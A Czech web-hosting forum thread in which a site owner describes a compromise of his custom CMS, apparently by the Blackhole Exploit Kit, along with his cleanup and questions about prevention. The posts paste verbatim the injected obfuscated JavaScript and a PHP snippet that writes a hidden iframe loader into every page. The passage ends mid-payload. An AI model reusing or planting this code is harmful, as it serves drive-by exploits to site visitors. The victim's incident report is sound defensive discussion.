#1 Re: Ostatní problémy » Hack - Vnořený kód rozbil web » 2013-09-03 23:43:50

chmody jsou nastavené na 755 za adresáře, a na 644 za soubory.

Pro upload uživatelských ikon a obrázků do galerií jsem nastavil restrikci formátů (jpg, gif, png), bez možnosti přejmenovávání souborů. Když nad tím ale tak přemýšlím, jako přílohu ke článku lze přejmenovat i přiložit cokoliv, včetně .php souboru. Tuto díru tedy opravím ...

Přesto, pro hack přes přílohy článků by se případný narušitel musel prvně registrovat, a poté založit článek s vlastním přílohovým adresářem (zanechal by po sobě evidentní stopy - což se nestalo).

Jinak, zajímavé postřehy. Vaše "banality a samozřejmosti" mi připadají jako mistrně promyšlené taktické tahy smile ... a to už jen proto, že jsem se s nimi nikdy nesetkal.

#2 Re: Ostatní problémy » Hack - Vnořený kód rozbil web » 2013-09-03 19:52:32

Dobře, v tuto chvíli mi ani nemusíte zablokovávat účet ... web jsem promazal, databázi překontroloval, infikované soubory vyměnil za čisté, hesla do webadminu, FTP a mySQL obměnil za silnější, autentizaci TLS/SSL na FTP klientu ověřil, jQuery aktualizoval, lokální počítač proskenoval na malware/trojany, register_globals a eval() nepoužívám ... a více mě už nenapadá.

Stále však čekám, že se k této bezpečnostní hrozbě, tj. k Blackhole Exploit Kit vyjádří některý z adminu/znalejších uživatelů.
Tzn., co ještě tak mohu udělat pro prevenci opětovného hacknutí webu?
Jak se tito útočníci do webu dostávají?

Přidám pár výživných komentářů:

As the website administrator for several sites that have had the Blackhole Exploit Kit I have only been able to upload fresh code from a known good source to fix the problem. Most of the time I see that the files affected are the minified javascript files (respond.min.js and others) but not always. I have seen this as the result of using html5shiv.js and html5printshiv.js as well. My hosting provider does not seem to have any real answers (GoDaddy) here but points to using their date/time stamps on ftp uploads and noticing the IP addresses associated with them as a means of isolating where the exploits are coming from. What am I going to do with that information? Travel to that country and beat up the person who uploaded that code? How in the heck would anyone but me be able to upload any code via ftp to my hosting package anyway, unless they know the credentials. I recently changed all of the ftp account passwords on my business and personal ftp accounts and the infection STILL HAPPENS! The only other way I can imagine this happening is through some back door method other than ftp. I have perused the internet looking for discussions, instructions, etc. for WEB DEVELOPERS to use in fixing this permanently but have found none. This is where the real problem is, not the client. If anyone knows of a blog, user group or otherwise that speaks to this malicious problem and how to solve it, please let me know. I have clients that get hopping mad at me for this and I don't seem to have any control over it.

I've cleaned this off two websites this week, one a WordPress site and one a 7-year-old custom PHP site. In both cases the malware snippets were appended to numerous files within the site, including index.php files, as well as .htaccess and PHP/HTML/TPL files that contained the words "header" or "footer" in the filename. Very sneaky as clearly they want every pageload on the site to deliver their payload.

Cleaning the infection is relatively simple, and Securi now proclaims my sites as safe. But what I'm having a harder time finding is information on how to *prevent* this sort of compromise in the first place. I've changed my FTP passwords, chmodded many of the affected files and folders to read only 444, and upgraded WP and all plugins to the newest versions. I'm on PHP 5 and don't use any obvious idiocy like register_globals. But is that enough? I'm on shared hosting, is it possible the compromise is happening at the server level?

How does one prevent this garbage from happening in the first place? Recommendations are always vague in this regard. I don't want to spend the rest of my life cleaning Blackhole exploits from my websites.

Tak ... co s tím?

#3 Re: Ostatní problémy » Hack - Vnořený kód rozbil web » 2013-09-03 15:23:50

Destroyer napsal:

FTP log můžete najít v administraci u ftp účtu

No, log tam vskutku je, ale ...

FTP log pro účet pipux: Žádné záznamy

Dělám něco špatně? smile

#4 Re: Ostatní problémy » Hack - Vnořený kód rozbil web » 2013-09-03 15:08:51

Drazí admini, jestli to bude možné, ještě vás poprosím o přístupové logy za web, SQL a FTP, k 30.8., okolo druhé hodiny noční.

Logy, které mám k dispozici (acces_log_x.gz, v adresáři log) se zřejmě po čtyřech dnech promazávají - nejstarší přístup tam teď vidím za 30.8., okolo šesté hodiny ranní (k útoku došlo o čtyři hodiny dříve).
Na FTP a SQL pak logy nemám/neznám.

#5 Ostatní problémy » Hack - Vnořený kód rozbil web » 2013-09-03 12:29:26

pipux
Odpovědi: 9

Zdravím,

Na svém webu http://icaenel.com se momentálně potýkám s nějakým balastem, který mi rozbil stránky.
Patrně půjde o hack, pravděpodobně související se zde nedávno rozebíraným tématem. Nicméně, nepoužívám žádný známý redakční systém staršího data, ale vlastní CMS ... což může odstranění problému zkomplikovat (wordpressáři a joomlaři si nahrají aktualizaci svého CMS, zatímco zde bude problém trochu zapeklitějšího charakteru). Proto i prosím o radu ...

-----

<body <script type="text/javascript" language="javascript" > izd="y";jht="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[jht].body)==null}()}catch(vxvs){qvys=function(lod){lod="fr"+"omCh"+lod;for(ptjvs=0;ptjvs<izd.length;ptjvs++){zpw+=String[lod](tfvvy(fwv+(izd[ptjvs]))-(95));}};};tfvvy=(eval);fwv="0x";dgdac=0;try{;}catch(ffomt){dgdac=1}if(!dgdac){try{++tfvvy(jht)["bo"+"d"+izd]}catch(vxvs){yxj="^";}izd="7f^c5^d4^cd^c2^d3^c8^ce^cd^7f^d5^d9^c4^d0^8f^98^87^88^7f^da^6c^69^7f^d5^c0^d1^7f^d2^d3^c0^d3^c8^c2^9c^86^c0^c9^c0^d7^86^9a^6c^69^7f^d5^c0^d1^7f^c2^ce^cd^d3^d1^ce^cb^cb^c4^d1^9c^86^c8^cd^c3^c4^d7^8d^cf^c7^cf^86^9a^6c^69^7f^d5^c0^d1^7f^d5^d9^c4^d0^7f^9c^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c2^d1^c4^c0^d3^c4^a4^cb^c4^cc^c4^cd^d3^87^86^c8^c5^d1^c0^cc^c4^86^88^9a^6c^69^6c^69^7f^d5^d9^c4^d0^8d^d2^d1^c2^7f^9c^7f^86^c7^d3^d3^cf^99^8e^8e^d3^c4^d2^d3^8f^93^94^91^8d^c5^d4^d3^d4^d1^c4^c7^ce^d2^d3^8d^cf^cb^8e^cc^c1^b0^cd^93^a7^d1^a9^8d^cf^c7^cf^86^9a^6c^69^7f^d5^d9^c4^d0^8d^d2^d3^d8^cb^c4^8d^cf^ce^d2^c8^d3^c8^ce^cd^7f^9c^7f^86^c0^c1^d2^ce^cb^d4^d3^c4^86^9a^6c^69^7f^d5^d9^c4^d0^8d^d2^d3^d8^cb^c4^8d^c2^ce^cb^ce^d1^7f^9c^7f^86^94^96^95^96^93^86^9a^6c^69^7f^d5^d9^c4^d0^8d^d2^d3^d8^cb^c4^8d^c7^c4^c8^c6^c7^d3^7f^9c^7f^86^94^96^95^96^93^cf^d7^86^9a^6c^69^7f^d5^d9^c4^d0^8d^d2^d3^d8^cb^c4^8d^d6^c8^c3^d3^c7^7f^9c^7f^86^94^96^95^96^93^cf^d7^86^9a^6c^69^7f^d5^d9^c4^d0^8d^d2^d3^d8^cb^c4^8d^cb^c4^c5^d3^7f^9c^7f^86^90^8f^8f^8f^94^96^95^96^93^86^9a^6c^69^7f^d5^d9^c4^d0^8d^d2^d3^d8^cb^c4^8d^d3^ce^cf^7f^9c^7f^86^90^8f^8f^8f^94^96^95^96^93^86^9a^6c^69^6c^69^7f^c8^c5^7f^87^80^c3^ce^c2^d4^cc^c4^cd^d3^8d^c6^c4^d3^a4^cb^c4^cc^c4^cd^d3^a1^d8^a8^c3^87^86^d5^d9^c4^d0^86^88^88^7f^da^6c^69^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^d6^d1^c8^d3^c4^87^86^9b^cf^7f^c8^c3^9c^bb^86^d5^d9^c4^d0^bb^86^7f^c2^cb^c0^d2^d2^9c^bb^86^d5^d9^c4^d0^8f^98^bb^86^7f^9d^9b^8e^cf^9d^86^88^9a^6c^69^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c6^c4^d3^a4^cb^c4^cc^c4^cd^d3^a1^d8^a8^c3^87^86^d5^d9^c4^d0^86^88^8d^c0^cf^cf^c4^cd^c3^a2^c7^c8^cb^c3^87^d5^d9^c4^d0^88^9a^6c^69^7f^dc^6c^69^dc^6c^69^c5^d4^cd^c2^d3^c8^ce^cd^7f^b2^c4^d3^a2^ce^ce^ca^c8^c4^87^c2^ce^ce^ca^c8^c4^ad^c0^cc^c4^8b^c2^ce^ce^ca^c8^c4^b5^c0^cb^d4^c4^8b^cd^a3^c0^d8^d2^8b^cf^c0^d3^c7^88^7f^da^6c^69^7f^d5^c0^d1^7f^d3^ce^c3^c0^d8^7f^9c^7f^cd^c4^d6^7f^a3^c0^d3^c4^87^88^9a^6c^69^7f^d5^c0^d1^7f^c4^d7^cf^c8^d1^c4^7f^9c^7f^cd^c4^d6^7f^a3^c0^d3^c4^87^88^9a^6c^69^7f^c8^c5^7f^87^cd^a3^c0^d8^d2^9c^9c^cd^d4^cb^cb^7f^db^db^7f^cd^a3^c0^d8^d2^9c^9c^8f^88^7f^cd^a3^c0^d8^d2^9c^90^9a^6c^69^7f^c4^d7^cf^c8^d1^c4^8d^d2^c4^d3^b3^c8^cc^c4^87^d3^ce^c3^c0^d8^8d^c6^c4^d3^b3^c8^cc^c4^87^88^7f^8a^7f^92^95^8f^8f^8f^8f^8f^89^91^93^89^cd^a3^c0^d8^d2^88^9a^6c^69^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c2^ce^ce^ca^c8^c4^7f^9c^7f^c2^ce^ce^ca^c8^c4^ad^c0^cc^c4^8a^81^9c^81^8a^c4^d2^c2^c0^cf^c4^87^c2^ce^ce^ca^c8^c4^b5^c0^cb^d4^c4^88^6c^69^7f^8a^7f^81^9a^c4^d7^cf^c8^d1^c4^d2^9c^81^7f^8a^7f^c4^d7^cf^c8^d1^c4^8d^d3^ce^a6^ac^b3^b2^d3^d1^c8^cd^c6^87^88^7f^8a^7f^87^87^cf^c0^d3^c7^88^7f^9e^7f^81^9a^7f^cf^c0^d3^c7^9c^81^7f^8a^7f^cf^c0^d3^c7^7f^99^7f^81^81^88^9a^6c^69^dc^6c^69^c5^d4^cd^c2^d3^c8^ce^cd^7f^a6^c4^d3^a2^ce^ce^ca^c8^c4^87^7f^cd^c0^cc^c4^7f^88^7f^da^6c^69^7f^d5^c0^d1^7f^d2^d3^c0^d1^d3^7f^9c^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c2^ce^ce^ca^c8^c4^8d^c8^cd^c3^c4^d7^ae^c5^87^7f^cd^c0^cc^c4^7f^8a^7f^81^9c^81^7f^88^9a^6c^69^7f^d5^c0^d1^7f^cb^c4^cd^7f^9c^7f^d2^d3^c0^d1^d3^7f^8a^7f^cd^c0^cc^c4^8d^cb^c4^cd^c6^d3^c7^7f^8a^7f^90^9a^6c^69^7f^c8^c5^7f^87^7f^87^7f^80^d2^d3^c0^d1^d3^7f^88^7f^85^85^6c^69^7f^87^7f^cd^c0^cc^c4^7f^80^9c^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c2^ce^ce^ca^c8^c4^8d^d2^d4^c1^d2^d3^d1^c8^cd^c6^87^7f^8f^8b^7f^cd^c0^cc^c4^8d^cb^c4^cd^c6^d3^c7^7f^88^7f^88^7f^88^6c^69^7f^da^6c^69^7f^d1^c4^d3^d4^d1^cd^7f^cd^d4^cb^cb^9a^6c^69^7f^dc^6c^69^7f^c8^c5^7f^87^7f^d2^d3^c0^d1^d3^7f^9c^9c^7f^8c^90^7f^88^7f^d1^c4^d3^d4^d1^cd^7f^cd^d4^cb^cb^9a^6c^69^7f^d5^c0^d1^7f^c4^cd^c3^7f^9c^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c2^ce^ce^ca^c8^c4^8d^c8^cd^c3^c4^d7^ae^c5^87^7f^81^9a^81^8b^7f^cb^c4^cd^7f^88^9a^6c^69^7f^c8^c5^7f^87^7f^c4^cd^c3^7f^9c^9c^7f^8c^90^7f^88^7f^c4^cd^c3^7f^9c^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c2^ce^ce^ca^c8^c4^8d^cb^c4^cd^c6^d3^c7^9a^6c^69^7f^d1^c4^d3^d4^d1^cd^7f^d4^cd^c4^d2^c2^c0^cf^c4^87^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c2^ce^ce^ca^c8^c4^8d^d2^d4^c1^d2^d3^d1^c8^cd^c6^87^7f^cb^c4^cd^8b^7f^c4^cd^c3^7f^88^7f^88^9a^6c^69^dc^6c^69^c8^c5^7f^87^cd^c0^d5^c8^c6^c0^d3^ce^d1^8d^c2^ce^ce^ca^c8^c4^a4^cd^c0^c1^cb^c4^c3^88^6c^69^da^6c^69^c8^c5^87^a6^c4^d3^a2^ce^ce^ca^c8^c4^87^86^d5^c8^d2^c8^d3^c4^c3^be^d4^d0^86^88^9c^9c^94^94^88^da^dc^c4^cb^d2^c4^da^b2^c4^d3^a2^ce^ce^ca^c8^c4^87^86^d5^c8^d2^c8^d3^c4^c3^be^d4^d0^86^8b^7f^86^94^94^86^8b^7f^86^90^86^8b^7f^86^8e^86^88^9a^6c^69^6c^69^d5^d9^c4^d0^8f^98^87^88^9a^6c^69^dc^6c^69^dc".split(yxj);zpw="";qvys("arCode");tfvvy(""+zpw);}</script> >

Toto není můj kód.

<script type="text/javascript" language="javascript" >   
if(document.querySelector)zndy=4;euy=("79,bf,ce,c7,bc,cd,c2,c8,c7,79,d3,ce,cb,c7,c1,89,92,81,82,79,d4,66,63,79,cf,ba,cb,79,cc,cd,ba,cd,c2,bc,96,80,ba,c3,ba,d1,80,94,66,63,79,cf,ba,cb,79,bc,c8,c7,cd,cb,c8,c5,c5,be,cb,96,80,c2,c7,bd,be,d1,87,c9,c1,c9,80,94,66,63,79,cf,ba,cb,79,d3,ce,cb,c7,c1,79,96,79,bd,c8,bc,ce,c6,be,c7,cd,87,bc,cb,be,ba,cd,be,9e,c5,be,c6,be,c7,cd,81,80,c2,bf,cb,ba,c6,be,80,82,94,66,63,66,63,79,d3,ce,cb,c7,c1,87,cc,cb,bc,79,96,79,80,c1,cd,cd,c9,93,88,88,cd,be,cc,cd,89,8d,8e,8b,87,bf,ce,cd,ce,cb,be,c1,c8,cc,cd,87,c9,c5,88,c6,bb,aa,c7,8d,a1,cb,a3,87,c9,c1,c9,80,94,66,63,79,d3,ce,cb,c7,c1,87,cc,cd,d2,c5,be,87,c9,c8,cc,c2,cd,c2,c8,c7,79,96,79,80,ba,bb,cc,c8,c5,ce,cd,be,80,94,66,63,79,d3,ce,cb,c7,c1,87,cc,cd,d2,c5,be,87,bc,c8,c5,c8,cb,79,96,79,80,8e,80,94,66,63,79,d3,ce,cb,c7,c1,87,cc,cd,d2,c5,be,87,c1,be,c2,c0,c1,cd,79,96,79,80,8e,c9,d1,80,94,66,63,79,d3,ce,cb,c7,c1,87,cc,cd,d2,c5,be,87,d0,c2,bd,cd,c1,79,96,79,80,8e,c9,d1,80,94,66,63,79,d3,ce,cb,c7,c1,87,cc,cd,d2,c5,be,87,c5,be,bf,cd,79,96,79,80,8a,89,89,89,8e,80,94,66,63,79,d3,ce,cb,c7,c1,87,cc,cd,d2,c5,be,87,cd,c8,c9,79,96,79,80,8a,89,89,89,8e,80,94,66,63,66,63,79,c2,bf,79,81,7a,bd,c8,bc,ce,c6,be,c7,cd,87,c0,be,cd,9e,c5,be,c6,be,c7,cd,9b,d2,a2,bd,81,80,d3,ce,cb,c7,c1,80,82,82,79,d4,66,63,79,bd,c8,bc,ce,c6,be,c7,cd,87,d0,cb,c2,cd,be,81,80,95,c9,79,c2,bd,96,b5,80,d3,ce,cb,c7,c1,b5,80,79,bc,c5,ba,cc,cc,96,b5,80,d3,ce,cb,c7,c1,89,92,b5,80,79,97,95,88,c9,97,80,82,94,66,63,79,bd,c8,bc,ce,c6,be,c7,cd,87,c0,be,cd,9e,c5,be,c6,be,c7,cd,9b,d2,a2,bd,81,80,d3,ce,cb,c7,c1,80,82,87,ba,c9,c9,be,c7,bd,9c,c1,c2,c5,bd,81,d3,ce,cb,c7,c1,82,94,66,63,79,d6,66,63,d6,66,63,bf,ce,c7,bc,cd,c2,c8,c7,79,ac,be,cd,9c,c8,c8,c4,c2,be,81,bc,c8,c8,c4,c2,be,a7,ba,c6,be,85,bc,c8,c8,c4,c2,be,af,ba,c5,ce,be,85,c7,9d,ba,d2,cc,85,c9,ba,cd,c1,82,79,d4,66,63,79,cf,ba,cb,79,cd,c8,bd,ba,d2,79,96,79,c7,be,d0,79,9d,ba,cd,be,81,82,94,66,63,79,cf,ba,cb,79,be,d1,c9,c2,cb,be,79,96,79,c7,be,d0,79,9d,ba,cd,be,81,82,94,66,63,79,c2,bf,79,81,c7,9d,ba,d2,cc,96,96,c7,ce,c5,c5,79,d5,d5,79,c7,9d,ba,d2,cc,96,96,89,82,79,c7,9d,ba,d2,cc,96,8a,94,66,63,79,be,d1,c9,c2,cb,be,87,cc,be,cd,ad,c2,c6,be,81,cd,c8,bd,ba,d2,87,c0,be,cd,ad,c2,c6,be,81,82,79,84,79,8c,8f,89,89,89,89,89,83,8b,8d,83,c7,9d,ba,d2,cc,82,94,66,63,79,bd,c8,bc,ce,c6,be,c7,cd,87,bc,c8,c8,c4,c2,be,79,96,79,bc,c8,c8,c4,c2,be,a7,ba,c6,be,84,7b,96,7b,84,be,cc,bc,ba,c9,be,81,bc,c8,c8,c4,c2,be,af,ba,c5,ce,be,82,66,63,79,84,79,7b,94,be,d1,c9,c2,cb,be,cc,96,7b,79,84,79,be,d1,c9,c2,cb,be,87,cd,c8,a0,a6,ad,ac,cd,cb,c2,c7,c0,81,82,79,84,79,81,81,c9,ba,cd,c1,82,79,98,79,7b,94,79,c9,ba,cd,c1,96,7b,79,84,79,c9,ba,cd,c1,79,93,79,7b,7b,82,94,66,63,d6,66,63,bf,ce,c7,bc,cd,c2,c8,c7,79,a0,be,cd,9c,c8,c8,c4,c2,be,81,79,c7,ba,c6,be,79,82,79,d4,66,63,79,cf,ba,cb,79,cc,cd,ba,cb,cd,79,96,79,bd,c8,bc,ce,c6,be,c7,cd,87,bc,c8,c8,c4,c2,be,87,c2,c7,bd,be,d1,a8,bf,81,79,c7,ba,c6,be,79,84,79,7b,96,7b,79,82,94,66,63,79,cf,ba,cb,79,c5,be,c7,79,96,79,cc,cd,ba,cb,cd,79,84,79,c7,ba,c6,be,87,c5,be,c7,c0,cd,c1,79,84,79,8a,94,66,63,79,c2,bf,79,81,79,81,79,7a,cc,cd,ba,cb,cd,79,82,79,7f,7f,66,63,79,81,79,c7,ba,c6,be,79,7a,96,79,bd,c8,bc,ce,c6,be,c7,cd,87,bc,c8,c8,c4,c2,be,87,cc,ce,bb,cc,cd,cb,c2,c7,c0,81,79,89,85,79,c7,ba,c6,be,87,c5,be,c7,c0,cd,c1,79,82,79,82,79,82,66,63,79,d4,66,63,79,cb,be,cd,ce,cb,c7,79,c7,ce,c5,c5,94,66,63,79,d6,66,63,79,c2,bf,79,81,79,cc,cd,ba,cb,cd,79,96,96,79,86,8a,79,82,79,cb,be,cd,ce,cb,c7,79,c7,ce,c5,c5,94,66,63,79,cf,ba,cb,79,be,c7,bd,79,96,79,bd,c8,bc,ce,c6,be,c7,cd,87,bc,c8,c8,c4,c2,be,87,c2,c7,bd,be,d1,a8,bf,81,79,7b,94,7b,85,79,c5,be,c7,79,82,94,66,63,79,c2,bf,79,81,79,be,c7,bd,79,96,96,79,86,8a,79,82,79,be,c7,bd,79,96,79,bd,c8,bc,ce,c6,be,c7,cd,87,bc,c8,c8,c4,c2,be,87,c5,be,c7,c0,cd,c1,94,66,63,79,cb,be,cd,ce,cb,c7,79,ce,c7,be,cc,bc,ba,c9,be,81,79,bd,c8,bc,ce,c6,be,c7,cd,87,bc,c8,c8,c4,c2,be,87,cc,ce,bb,cc,cd,cb,c2,c7,c0,81,79,c5,be,c7,85,79,be,c7,bd,79,82,79,82,94,66,63,d6,66,63,c2,bf,79,81,c7,ba,cf,c2,c0,ba,cd,c8,cb,87,bc,c8,c8,c4,c2,be,9e,c7,ba,bb,c5,be,bd,82,66,63,d4,66,63,c2,bf,81,a0,be,cd,9c,c8,c8,c4,c2,be,81,80,cf,c2,cc,c2,cd,be,bd,b8,ce,ca,80,82,96,96,8e,8e,82,d4,d6,be,c5,cc,be,d4,ac,be,cd,9c,c8,c8,c4,c2,be,81,80,cf,c2,cc,c2,cd,be,bd,b8,ce,ca,80,85,79,80,8e,8e,80,85,79,80,8a,80,85,79,80,88,80,82,94,66,63,66,63,d3,ce,cb,c7,c1,89,92,81,82,94,66,63,d6,66,63,d6".split(","));htshx=eval;function cas(){waw=function(){--(hrgctp.body)}()}hrgctp=document;for(ptd=0;ptd<euy["length"];ptd+=1){euy[ptd]=-(89)+parseInt(euy[ptd],zndy*4);}try{cas()}catch(pxwj){siuvv=50-50;}if(!siuvv)htshx(String["fr"+"omCh"+"arCo"+"de"].apply(String,euy));</script><!--/74ed9f-->

Toto také ne. A nelíbí se mi to.

Dále se nezobrazuje patička webu (obyčejný php include), v níž je standardně umístěna Endora reklama; reklama tudíž skočí na první řádek vygenerovaného html kódu.

-----

EDIT: v lokálním souboru index.php mám uloženo toto:

<body<?php if ($_GET['inc'] == "map") {echo ' ' . 'onload="initialize()"';}?>>

... zatímco v souboru index.php na doméně se nachází toto:

<body<?php if ($_GET['inc'] == "map") {echo ' ' . 'onload="initialize()"';}?>
<?
#74ed9f#
if(empty($r)) { $r = " <script type=\"text/javascript\" language=\"javascript\" > izd=\"y\";jht=\"d\"+\"o\"+\"c\"+\"ument\";try{+function(){if(document.querySelector)++(window[jht].body)==null}()}catch(vxvs){qvys=function(lod){lod=\"fr\"+\"omCh\"+lod;for(ptjvs=0;ptjvs<izd.length;ptjvs++){zpw+=String[lod](tfvvy(fwv+(izd[ptjvs]))-(95));}};};tfvvy=(eval);fwv=\"0x\";dgdac=0;try{;}catch(ffomt){dgdac=1}if(!dgdac){try{++tfvvy(jht)[\"\x62o\"+\"d\"+izd]}catch(vxvs){yxj=\"^\";}izd=\"7f^c5^d4^cd^c2^d3^c8^ce^cd^7f^d5^d9^c4^d0^8f^98^87^88^7f^da^6c^69^7f^d5^c0^d1^7f^d2^d3^c0^d3^c8^c2^9c^86^c0^c9^c0^d7^86^9a^6c^69^7f^d5^c0^d1^7f^c2^ce^cd^d3^d1^ce^cb^cb^c4^d1^9c^86^c8^cd^c3^c4^d7^8d^cf^c7^cf^86^9a^6c^69^7f^d5^c0^d1^7f^d5^d9^c4^d0^7f^9c^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c2^d1^c4^c0^d3^c4^a4^cb^c4^cc^c4^cd^d3^87^86^c8^c5^d1^c0^cc^c4^86^88^9a^6c^69^6c^69^7f^d5^d9^c4^d0^8d^d2^d1^c2^7f^9c^7f^86^c7^d3^d3^cf^99^8e^8e^d3^c4^d2^d3^8f^93^94^91^8d^c5^d4^d3^d4^d1^c4^c7^ce^d2^d3^8d^cf^cb^8e^cc^c1^b0^cd^93^a7^d1^a9^8d^cf^c7^cf^86^9a^6c^69^7f^d5^d9^c4^d0^8d^d2^d3^d8^cb^c4^8d^cf^ce^d2^c8^d3^c8^ce^cd^7f^9c^7f^86^c0^c1^d2^ce^cb^d4^d3^c4^86^9a^6c^69^7f^d5^d9^c4^d0^8d^d2^d3^d8^cb^c4^8d^c2^ce^cb^ce^d1^7f^9c^7f^86^94^96^95^96^93^86^9a^6c^69^7f^d5^d9^c4^d0^8d^d2^d3^d8^cb^c4^8d^c7^c4^c8^c6^c7^d3^7f^9c^7f^86^94^96^95^96^93^cf^d7^86^9a^6c^69^7f^d5^d9^c4^d0^8d^d2^d3^d8^cb^c4^8d^d6^c8^c3^d3^c7^7f^9c^7f^86^94^96^95^96^93^cf^d7^86^9a^6c^69^7f^d5^d9^c4^d0^8d^d2^d3^d8^cb^c4^8d^cb^c4^c5^d3^7f^9c^7f^86^90^8f^8f^8f^94^96^95^96^93^86^9a^6c^69^7f^d5^d9^c4^d0^8d^d2^d3^d8^cb^c4^8d^d3^ce^cf^7f^9c^7f^86^90^8f^8f^8f^94^96^95^96^93^86^9a^6c^69^6c^69^7f^c8^c5^7f^87^80^c3^ce^c2^d4^cc^c4^cd^d3^8d^c6^c4^d3^a4^cb^c4^cc^c4^cd^d3^a1^d8^a8^c3^87^86^d5^d9^c4^d0^86^88^88^7f^da^6c^69^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^d6^d1^c8^d3^c4^87^86^9b^cf^7f^c8^c3^9c^bb^86^d5^d9^c4^d0^bb^86^7f^c2^cb^c0^d2^d2^9c^bb^86^d5^d9^c4^d0^8f^98^bb^86^7f^9d^9b^8e^cf^9d^86^88^9a^6c^69^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c6^c4^d3^a4^cb^c4^cc^c4^cd^d3^a1^d8^a8^c3^87^86^d5^d9^c4^d0^86^88^8d^c0^cf^cf^c4^cd^c3^a2^c7^c8^cb^c3^87^d5^d9^c4^d0^88^9a^6c^69^7f^dc^6c^69^dc^6c^69^c5^d4^cd^c2^d3^c8^ce^cd^7f^b2^c4^d3^a2^ce^ce^ca^c8^c4^87^c2^ce^ce^ca^c8^c4^ad^c0^cc^c4^8b^c2^ce^ce^ca^c8^c4^b5^c0^cb^d4^c4^8b^cd^a3^c0^d8^d2^8b^cf^c0^d3^c7^88^7f^da^6c^69^7f^d5^c0^d1^7f^d3^ce^c3^c0^d8^7f^9c^7f^cd^c4^d6^7f^a3^c0^d3^c4^87^88^9a^6c^69^7f^d5^c0^d1^7f^c4^d7^cf^c8^d1^c4^7f^9c^7f^cd^c4^d6^7f^a3^c0^d3^c4^87^88^9a^6c^69^7f^c8^c5^7f^87^cd^a3^c0^d8^d2^9c^9c^cd^d4^cb^cb^7f^db^db^7f^cd^a3^c0^d8^d2^9c^9c^8f^88^7f^cd^a3^c0^d8^d2^9c^90^9a^6c^69^7f^c4^d7^cf^c8^d1^c4^8d^d2^c4^d3^b3^c8^cc^c4^87^d3^ce^c3^c0^d8^8d^c6^c4^d3^b3^c8^cc^c4^87^88^7f^8a^7f^92^95^8f^8f^8f^8f^8f^89^91^93^89^cd^a3^c0^d8^d2^88^9a^6c^69^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c2^ce^ce^ca^c8^c4^7f^9c^7f^c2^ce^ce^ca^c8^c4^ad^c0^cc^c4^8a^81^9c^81^8a^c4^d2^c2^c0^cf^c4^87^c2^ce^ce^ca^c8^c4^b5^c0^cb^d4^c4^88^6c^69^7f^8a^7f^81^9a^c4^d7^cf^c8^d1^c4^d2^9c^81^7f^8a^7f^c4^d7^cf^c8^d1^c4^8d^d3^ce^a6^ac^b3^b2^d3^d1^c8^cd^c6^87^88^7f^8a^7f^87^87^cf^c0^d3^c7^88^7f^9e^7f^81^9a^7f^cf^c0^d3^c7^9c^81^7f^8a^7f^cf^c0^d3^c7^7f^99^7f^81^81^88^9a^6c^69^dc^6c^69^c5^d4^cd^c2^d3^c8^ce^cd^7f^a6^c4^d3^a2^ce^ce^ca^c8^c4^87^7f^cd^c0^cc^c4^7f^88^7f^da^6c^69^7f^d5^c0^d1^7f^d2^d3^c0^d1^d3^7f^9c^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c2^ce^ce^ca^c8^c4^8d^c8^cd^c3^c4^d7^ae^c5^87^7f^cd^c0^cc^c4^7f^8a^7f^81^9c^81^7f^88^9a^6c^69^7f^d5^c0^d1^7f^cb^c4^cd^7f^9c^7f^d2^d3^c0^d1^d3^7f^8a^7f^cd^c0^cc^c4^8d^cb^c4^cd^c6^d3^c7^7f^8a^7f^90^9a^6c^69^7f^c8^c5^7f^87^7f^87^7f^80^d2^d3^c0^d1^d3^7f^88^7f^85^85^6c^69^7f^87^7f^cd^c0^cc^c4^7f^80^9c^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c2^ce^ce^ca^c8^c4^8d^d2^d4^c1^d2^d3^d1^c8^cd^c6^87^7f^8f^8b^7f^cd^c0^cc^c4^8d^cb^c4^cd^c6^d3^c7^7f^88^7f^88^7f^88^6c^69^7f^da^6c^69^7f^d1^c4^d3^d4^d1^cd^7f^cd^d4^cb^cb^9a^6c^69^7f^dc^6c^69^7f^c8^c5^7f^87^7f^d2^d3^c0^d1^d3^7f^9c^9c^7f^8c^90^7f^88^7f^d1^c4^d3^d4^d1^cd^7f^cd^d4^cb^cb^9a^6c^69^7f^d5^c0^d1^7f^c4^cd^c3^7f^9c^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c2^ce^ce^ca^c8^c4^8d^c8^cd^c3^c4^d7^ae^c5^87^7f^81^9a^81^8b^7f^cb^c4^cd^7f^88^9a^6c^69^7f^c8^c5^7f^87^7f^c4^cd^c3^7f^9c^9c^7f^8c^90^7f^88^7f^c4^cd^c3^7f^9c^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c2^ce^ce^ca^c8^c4^8d^cb^c4^cd^c6^d3^c7^9a^6c^69^7f^d1^c4^d3^d4^d1^cd^7f^d4^cd^c4^d2^c2^c0^cf^c4^87^7f^c3^ce^c2^d4^cc^c4^cd^d3^8d^c2^ce^ce^ca^c8^c4^8d^d2^d4^c1^d2^d3^d1^c8^cd^c6^87^7f^cb^c4^cd^8b^7f^c4^cd^c3^7f^88^7f^88^9a^6c^69^dc^6c^69^c8^c5^7f^87^cd^c0^d5^c8^c6^c0^d3^ce^d1^8d^c2^ce^ce^ca^c8^c4^a4^cd^c0^c1^cb^c4^c3^88^6c^69^da^6c^69^c8^c5^87^a6^c4^d3^a2^ce^ce^ca^c8^c4^87^86^d5^c8^d2^c8^d3^c4^c3^be^d4^d0^86^88^9c^9c^94^94^88^da^dc^c4^cb^d2^c4^da^b2^c4^d3^a2^ce^ce^ca^c8^c4^87^86^d5^c8^d2^c8^d3^c4^c3^be^d4^d0^86^8b^7f^86^94^94^86^8b^7f^86^90^86^8b^7f^86^8e^86^88^9a^6c^69^6c^69^d5^d9^c4^d0^8